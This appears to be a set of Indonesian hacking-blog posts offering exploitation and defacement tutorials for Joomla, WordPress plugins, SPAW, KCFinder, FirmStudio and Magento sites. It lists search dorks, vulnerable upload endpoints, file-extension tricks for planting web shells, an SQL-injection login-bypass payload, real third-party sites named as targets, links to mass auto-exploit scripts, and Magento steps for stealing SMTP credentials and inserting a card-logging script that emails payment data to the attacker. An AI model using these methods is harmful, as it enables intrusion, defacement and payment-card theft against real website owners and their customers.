Joomla Com_Adsmanager Scanner + Auto Exploiter PHP

Dork :
- inurl:index.php?option=com_adsmanager
- inurl:index.php?option=com_adsmanager intitle:-ads site:.au
- intext:"adsmanager version 2.5"
- "com_adsmanager" site:.au
- Kembangin lagi ya :)

Exploit :
TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component
*Jika vuln akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_960"}

Shell Akses :
TARGET/tmp/plupload/NAMA_SHELL_KAMU.php

Script Auto Exploit :
Scriptnya disini sudah w jadiin satu di rar, cara gunainnya tinggal extraxt terus command seperti biasanya.
Download scriptnya disini

Cara Penggunaan :
- command: php scriptkamu.php targetlist.txt
- Untuk membuka akses shell kusus pengguna windows bisa lngsung command: hasil.html , nanti akan otomatis terbuka di browser.
- Lebih jelasnya lihat di ss bawah :)

Screenshot :

Semoga Bermanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Formcraft Scanner + Auto Exploiter PHP

Dork :
- inurl:/wp-content/plugins/formcraft/ site:.au
- intext:"powered by formcraft"
- inurl:/plugins/formcraft
- Bisa dikembangin sndiri ya dorknya, hehe..

Exploit :
- /wp-content/plugins/formcraft/file-upload/server/php/
(Jika vuln akan ada tulisan seperti csrf kurang lebih seperti ini: "files":["name"] bla bla bla bla...)

Script Auto Exploit :
Tools sudah ku jadikan satu paket di rar, makenya tinggal extract lalu gunain sperti biasanya
Download scriptnya disini

Cara Penggunaan :
- Sebenarnya sudah ku tulis di scriptnya cara gunainya, tpi gppalah w tulis lagi dsini
- php namascriptmu.php targetlist.txt
- Jika success upload shell akan disimpan di hasil.htm
- Khusus pengguna windows bisa lnsung mengetikkan di command > hasil.htm (nanti akan kebuka langsung di browser otomatis)

Screenshot :

Semoga bermanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Method Deface FirmStudio CMS (filemanager) Arbitrary File Upload

Sekitar 2.090 hasil (0,50 detik)
Lumayan lah website yang vuln dengan method ini, hehe..
gaisah basa basi lgi. simak baik" ye tutornya, lets cekidoot:

DORK :
- intext:"Website by FirmStudio"
- intext:"Website by FirmStudio" site:.de

EXPLOIT :
site.com/path/include/filemanager/dialog.php

CIRI-CIRI WEB VULN :

CARA UPLOAD SHELL :
- rename shellmu jadi:
1. shell.php.jpg
2. shell.php5
3. shell.php.png
4. shell.php.xxxjpg
5. kreasikan lagi ya, exstensi ini untuk mengbypass supaya bisa upload file.php, karena defaultnya  hanya menerima file .html .txt .gif
- Jika sudah di rename. Letak upload file ada sebelah kiri atas sebelah tulisan "Action"

SHELL AKSES :
site.com/uploaded_files/NAMA_SHELLMU

Kalo beruntung nih bisa dapet dir mayan lah, tapi kadang juga Not Writable smua, yg writable cuman file /temp/ doang. Caranya biar bisa akses tuh folder gunain method root server, bisa di googling :)

Buat belajar bisa gunaiin ini :
http://www.hiphing.com.hk/include/filemanager/dialog.php
http://www.cornes.hk/include/filemanager/dialog.php
http://www.jinchuan-intl.com/include/filemanager/dialog.php
http://www.starrhotels.com/include/filemanager/dialog.php
http://www.jewelryshows.org/include/filemanager/dialog.php
http://www.mhh.com.hk/include/filemanager/dialog.php
http://www.metrokitchen.com.hk/include/filemanager/dialog.php
http://www.alisan.com.hk/include/filemanager/dialog.php
http://www.cornesworld.com/include/filemanager/dialog.php
http://www.hairworks.com.hk/include/filemanager/dialog.php

Dah gitu aja ya, semoga bermanfaat :)
Keep Exploiting

Baca Selengkapnya »

Method Deface SPAWN File Upload

Kali ini gw mo share exploit lama ya, btw ini jga bwat ngisi artikel aja, haha
Di exploit ini kita cuman diperbolehkan nitip file dengan format:
.txt dan .html
so kalian juga bisa mencoba dengan method tamper data / yang lain jika ingin mengupload file .php
gw juga blom nyoba sih ke bbrapa site..
sjauh ini yg gw temuin mesti kena notif "Error: files of this type are not allowed."

Skarang lngsung ke caranya ja ya, ikutin langkah-langkahnya:

Dork :
- inurl:/spaw2/uploads/files/ site:.com
- inurl:/spaw2/uploads/files/ site:.gov
- Bisa di kembangin sndiri ya :)

Exploit :
site,com/path/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

Langkah -Langkah :
- Masukin dork tadi di gugel, pilih site terserahlu..
- di url site target ganti jadi seperti ini:

Sebelumnya

www.wholehealthamerica.com/spaw2/uploads/files/

Sesudah

http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

- Ganti "Flash Movies" ke "Files", file type pilih All files (*.*).
- Sekarang Klik "Browse", pilih file mu. Jika sudah klik Upload

- Hasil file upload akan terUpload di site,com/path/spaw2/uploads/files/
- Jadi lngsung aja panggil file mu tadi dengan mengetikkan seperti ini:

http://www.wholehealthamerica.com/spaw2/uploads/files/ecf.txt

- Dah gitu aja gmpang kan :)

Semoga bermanfaat.

Baca Selengkapnya »

Method Deface JS Overlay

Gw lihat di mbah gugel tutorial disana udah bnyak sekali, metode kali ini yaitu JS Overlay, gw juga kurang tau knapa namanya JS Overlay, mungkin singkatan dari Javascript Overlay mungkin ya? haha..
Bagi lu yg udah mentok ngak bisa upload shell, upload poto, dan bingung gmna cara deface web yang tdk ada file uploadnya bahkan web itu tidak menyediakan tempat upload, naah tutorial ini ditunjukkan bwat yg dah mentok bingung gk bisa deface..

Sedikit berbeda dengan metode deface dengan upload shell, js overlay ini cara kerjanya memanggil script kita yang sudah jadi/lebih mudahnya sudah di upload di web dan dengan metode ini Konten web target akan ketimpa dengan script kita ini, tpi masih ttep ada kontennya, pasti masih bingung kan, so lngsung aja simak tutorialnya dibawah:

Script JS Overlay :


LANGKAH LANGKAH :

- Gw asumsikan lu dah punya web target yg dah mentok gk tau gimana cara defacenya
- Kita manfaatkan fasilitas cms web target, biasanya Add Article/Add Static Pages. Di tutorial ini gw manfaatin Add Static Pages
- Copas script JS Overlay di atas dan taruh di bagian Title, lebih jelasnya lihat gambar dibawah

- Save, dan lihat di web target tdi, kurang lebih jadi sperti ini

Dah gitu ja, simple kan hahaha..

Semoga bermanfaat

Baca Selengkapnya »

Mass Checker Adult Embed Script Bypass Krian

Default Dork :
- inurl:/ajax/videos_home.php?action= site:.com
- inurl:/static/3/dmca.html
- intext:"Your own text or Link here" Copyright © 2015
- intext:Copyright © 2015 Adult Embed Script All Rights Reserved.
- intext:Your own text or Link here porn inurl:channel
- Kembangin lagi yah :)

Live Target :
http://www.yehabesha.com
http://www.hibertube.com
http://www.etviral.com

Infected File :
http://localhost/admin/index.php

Exploit [Auth Bypass] :
USER: ADMIN' OR 1=1#
PASS: ADMIN' OR 1=1#

Cara Upload Shell [upload logo] :
http://localhost/admin/settings.php

Letak shell setelah di upload :
http://localhost/thumbnails/shell.php

Script Auto Exploit dibawah :



Klo masih bingung silahkan berkomentar :)

UNTUK UPLOAD SHELL GUNAKAN TAMPER DATA! BELUM TAU CARA MAKE TAMPER DATA? MASUK KEMARI

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Wordpress Checker PHP

Mengecek version, theme, plugin yg dipakai dalam suatu web, lngsng dari offcial theme dan pluginnya..
Kali ja ada yg minat bwat ngecek web target :D
Script ada di bwah :

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Auto Exploit Joomla com_cckjseblod LFD PHP

This summary is not available. Please click here to view the post.

Baca Selengkapnya »

Sub Domain Checker PHP

Sedikit pengertian dari subdomain itu sndiri Subdomain adalah bagian dari domain. Subdomain biasanya digunakan sebagai pembagian area dari sebuah website. Misalnya, untuk area utama website, digunakan www.yuzac0der.id dan untuk area diskusi digunakan subdomain forum.yuzac0der.id. Dalam contoh tersebut, "www" dan "forum" adalah nama subdomain.

Nah buat yg pengen tau subdomain dari sbuah website bisa gunain tool subdomain checker ini, penampakan ada di bawah

Sekrip ada di bawah.



cara penggunaan, save dlu filenya .php
run sperti biasanya php scripmu.php 'domain yg di scan tanpa http://'

Smoga brmanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Exploit Kcfinder Upload Shell

ths exploit discovered by incef team

nih udah lama emang, tpi apasalahnya share bwat yg blum tau bwat blajar jga..
Dah lngsng ja..

Dork: inurl:/kcfinder/upload.php (kmbangin sndiri y, jgn jagain dork)

Kalo vuln muncul "Unknown error"

Exploit :


Shell format : shell.php.ndsxf

Shell akses : site/path/upload/files/shell.php.ndsxf

slamat berexploitasi :) 

Baca Selengkapnya »

Magento Scanner + Mass Exploiter PHP

[UPDATED 10:18 PM 5/13/2016]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%

Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!

cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :



Dork magento, auto exploit magento versi web, smtp, upload shell, dll. masuk kesini

visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

Cara Tanam Shell menggunakan Tamper Data

Oke, pertama lu harus masuk ke web target. biasanya sih klo make tamper data poc nya: bypass admin > tamper data atau sqli > tamper data.

ALAT TEMPUR :
- Download dulu addons Tamper Data untuk mozilla atau chrome
- Shell backdoor yg sudah di rename menjadi .php.jpg/.php.png (menyesuaikan target)

LANGKAH - LANGKAH :
- Gw asumsikan elu dah ada di dalem web target
- Cari tempat upload gambar (apa aja yg penting ada tulisan upload/unggah), biasanya di add photo, upload fav icon, dll.

Dashboard

- Klo nemu tempat uplot image/file, biasanya bisa. Tpi tdak mnutup kmungkinan gagal, jdi d coba dulu aja.

- Buka Tamper Datanya, klik Start Tamper

- Klik Choose File, lalu pilih shell mu

- Klik simpan lalu Tamper

- Nanti akan muncul popup, lihat di sbelah kanan, bagian POST_DATA, pada box scrol ke bawah sampai ktemu nama file shellmu tadi, rename file tsb hilangin .png nya. lebih jealasnya lihat gambar

- Stelah oke, Klo muncun shell aksesnya brarti shell udah ke upload, jka gk nemu shell akses brarti udh kgak bsa lwat method tamper data ini.

- Tnggal copas ke address bar deh tuh..

- Terus upload shell kesayanganmu, yudh kalo udah sampe sini, trserah mau diapain.

Semoga bermanfaat :)

Baca Selengkapnya »

CMS Detector PHP

Untuk pengertian cms bwt yang belum paham masuk kesini

Cara penggunaan :

php scriptmu.php target.com

Langsung aja ye, comot scriptnya dimari

Thx to Yogyakarta Blackhat, SBH

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Baca Selengkapnya »

All about Magento exploit

[UPDATED 11:39 AM 5/27/2016]

Magento Scanner + Mass Exploiter PHP :
KESINI

Dork :
- intext:/skin/adminhtml/default/default/
- intitle:computer inurl:account/login/ site:.com
- intitle:computer inurl:account/login/create/ site:.com
- intext:"2016" inurl:account/login site:.com
- "shirt" inurl:customer/account/login/ site:.com
- "jeans" inurl:account/login site:.com
- intitle:shop inurl:account/login/create site:.com
- intext:2016 inurl:customer/account/ site:.com
- ganti site, intitle dan intext dengan apa saja / use your brain !

Ciri" cms magento :

 

LETAK SMTP :
- system > configuration > view menu SMTP pro
- kalau ada SMTP PRO klik dan lihat username, password, port dan server nya
- kalau password masih bentuk ******* ( inspect element > ganti value "password" dengan "text" )

Upload shell :
- perlu di ketahui tidak semua bisa di tanam shell , atau jika sembarangan tanam shell webnya bakal error
- kalau vuln dan bisa di tanam shell pergi ke : system > file system > IDE > cari file > edit UPLOADER atau LANGSUNG EDIT SHELL di dalamnya > save > dan kunjungi file yang tadi di edit

Ngelog PP&CC :
- tanem  shell dulu
- trus masuk ke /app/code/core/Mage/Payment/Model/Method/Cc.php
- masukin skrip logmu
- kalo bingung replace pake skripku, log v2
- cari kode ini $yuzamail = "eXV6YWMwZGVyQGFzaWEuY29t";
- ganti eXV6YWMwZGVyQGFzaWEuY29t sama emailmu, nanti log dikirim ksini (kalau web target support send mail) Cara test send mail ada di bawah..
- jgn lupa encript dulu dgn base64, bisa make punya si x'inject disini




Patching bug magento 1.7.0.2 :
- tanem shell dulu
- masuk ke /app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php
- cari code ini:

protected function _getOptionDownloadUrl($route, $params)
{

   return Mage::getUrl($route, $params);
}

- ganti dengan code ini:

protected function _getOptionDownloadUrl($route, $params)
{
    $websites = Mage::app()->getWebsites();
    $code = $websites[1]->getDefaultStore()->getCode();
    $params['_store'] = $code;

    return Mage::getUrl($route, $params);
}

Cara Upload File System :
*Catatan: jika ada ketidak sesuaian/ditemukan error tdak sperti gambar yg saya sertakan brarti tidak bisa di upload file system!
- Download dulu file system disini
Pass: yuzanotes.blogspot.co.id
- Masuk ke System > Magento Connect > Magento Connect Manager

- Jika Vuln maka akan muncul form login, jadi lu harus login ulang. Setelah login lu akan masuk ke halam ini, lihat gambar dibawah, dan upload file systemnya

- Nanti akan otomatis scrolling ke bawah sendiri dan jika sukses akan muncul notif seperti gambar dibawah

- Balik lagi ke dashboard admin, scrol ke atas ja terus klik Return to Admin

- Sekarang lihat file system udah terinstall. Dah sampe disini terserah mo diapain. Untuk cara upload shell baca lagi di atas dah jelas

Email Test Sender :
- Harus nanem shell dulu, gak tau caranya? baca lagi dari atas
- Taruh script di bawah terserah d taruh mana..



- Setelah itu buka lewat url, jika support kirim email akan nampak seperti gambar dibawah

- Masuk inbox nih :D

Semoga bermanfaat :)

Baca Selengkapnya »